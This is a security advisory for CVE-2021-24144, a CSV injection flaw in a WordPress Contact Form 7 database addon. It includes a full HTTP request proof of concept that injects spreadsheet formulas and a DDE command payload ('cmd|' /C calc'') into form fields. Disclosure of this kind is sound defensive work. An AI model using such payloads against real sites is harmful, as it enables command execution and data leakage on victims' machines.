WordPress Plugin Vulnerabilities

Contact Form 7 Database Addon < 1.2.5.6 - CSV Injection

Description

The plugin was prone to a vulnerability that lets remote attackers inject arbitrary formulas into CSV files. Attackers can possibly exploit this issue to execute arbitrary commands on the victim's system, by the use of Microsoft Excel DDE function, or to leak data via maliciously injected hyperlinks. Version 1.2.5.4 is vulnerable; prior versions may also be affected.

Proof of Concept

POST /wp-json/contact-form-7/v1/contact-forms/219/feedback HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:84.0) Gecko/20100101 Firefox/84.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------127233189811167375871189751352
Content-Length: 1339
Origin: http://example.com
Connection: close

-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7"

219
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_version"

5.3.2
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_locale"

en_US
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_unit_tag"

wpcf7-f219-p1-o1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_container_post"

1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="_wpcf7_posted_data_hash"


-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-name"

=SUM(1+2)
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-email"

erkgh@jfrif.com
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-subject"

=1+1
-----------------------------127233189811167375871189751352
Content-Disposition: form-data; name="your-message"

;=2+5+cmd|' /C calc'!A1
-----------------------------127233189811167375871189751352--

Affects Plugins

Plugin icon
contact-form-cfdb7
Fixed in 1.2.5.6

References

CVE
CVE-2021-24144
URL
https://plugins.trac.wordpress.org/changeset/2460800

Classification

Type
CSV INJECTION
OWASP top 10
A1: Injection
CWE
CWE-1236
CVSS
4.7 (medium)

Miscellaneous

Original Researcher
SunCSR-thiennv
Submitter
thiennv
Verified
Yes
WPVDB ID
143cdaff-c536-4ff9-8d64-c617511ddd48

Timeline

Publicly Published
2021-01-25 (about 3 years ago)
Added
2021-01-25 (about 3 years ago)
Last Updated
2021-01-29 (about 3 years ago)

Other

Published
Title
Published
2020-11-20
Title
weForms < 1.6.4 - CSV Injection
Published
2022-11-09
Title
Export customers list CSV for WooCommerce < 2.0.69 - CSV Injection
Published
2022-10-18
Title
WPForms Pro < 1.7.7 - CSV Injection
Published
2020-12-18
Title
Ultimate SMS Notifications for WooCommerce < 1.4.2 - CSV Injection
Published
2021-06-21
Title
Sign-up Sheets < 1.0.14 - Authenticated CSV Injection